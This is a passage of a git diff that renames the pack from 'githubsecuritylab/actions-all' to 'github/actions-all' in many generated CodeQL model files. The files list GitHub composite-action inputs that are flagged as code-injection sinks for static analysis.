diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 9ad4bb306662..6150422d177f 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 5fca46427e00..ad99ed2b432a 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 9f0fecbe10b9..5df1a5f22302 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index cadf01dbff1e..b2c5857a743a 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index ec4fc1da053c..93996601c8af 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index e6530a19d972..c1d90d6ab0a8 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 0bae4e91cde0..d29d4d5674d5 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0acb53ba1d3a..0aaacca4805c 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index f1b755e796b5..b69a77400798 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 7d1733d647ac..6ab3f7d2bf57 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 4bf33c9a343d..f5ce35d96ad5 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 9ca004a7c155..519adffb097b 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index fc3870d89a8e..69d0355d7202 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 1d621562771e..97a694393759 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index f09b364127e6..54e557061dfb 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 56e7b8142316..12ed97f6af51 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 9f953b32ab17..2c64a6978afe 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 257b77bc2c34..f7982d2244a4 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 49f2f86907f9..9678f3204257 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 1e33c5e540aa..2ee43fbcf6cd 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index cfbf15549c48..2560e80f52c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 24730af3d77a..17e4f893d390 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 6be5abd09dd7..dde14bfa277d 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 145b6f0d0e3e..0aabf2e1d7f1 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index c8b05bfd904b..6fdfb2e6eba0 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 04c218a76c1b..b068e810823e 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 5447d4b7e2ed..9107fd9e85cf 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index 825ce27511d7..ee81ae110455 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 8f3e49c9768a..a8030627789f 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 1937367debc7..a89b000bedff 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 01b77b7ccc6d..a98ea12496f6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index edbd28d401bf..8475ef342402 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 4b31bd66c5a6..fff5eaab1f49 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index a186fa070b0b..5d0cef62b0b4 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 92ee2971e3a2..3edfa5ef14db 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 07b8e96bfe29..d5f640e91a59 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 2a2a5baab45d..32945cb21e30 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 274fab01e921..42eeca98de4c 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 3671de9e58af..5c0777ce394a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 2ef34dac8ba7..ac777af02856 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index d76f20031e7e..26a587e4f5c6 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index eccb5dae2bd7..a26ebcfa57dc 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 3cbd3330ccd1..bf39b24e8411 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 73c9c1f24a2b..00cb4906bb51 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 90c4f699308a..85f583a5e880 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index ed4e8820c998..207b5705e513 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index df51b9fe4c84..f0f3be91b4ba 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 8fca8591ceb6..04e779b9579a 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 819728cf7187..7939469934e8 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index d3eaca780b40..1af5c9435afb 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index 42c00ea216b4..bcb9dc853d6d 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index a93d6a039d43..ec5b1a4e50c4 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 8a7784a6f01e..2f0bb66127b4 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 1b22d43bfad8..65953f0387ab 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml 
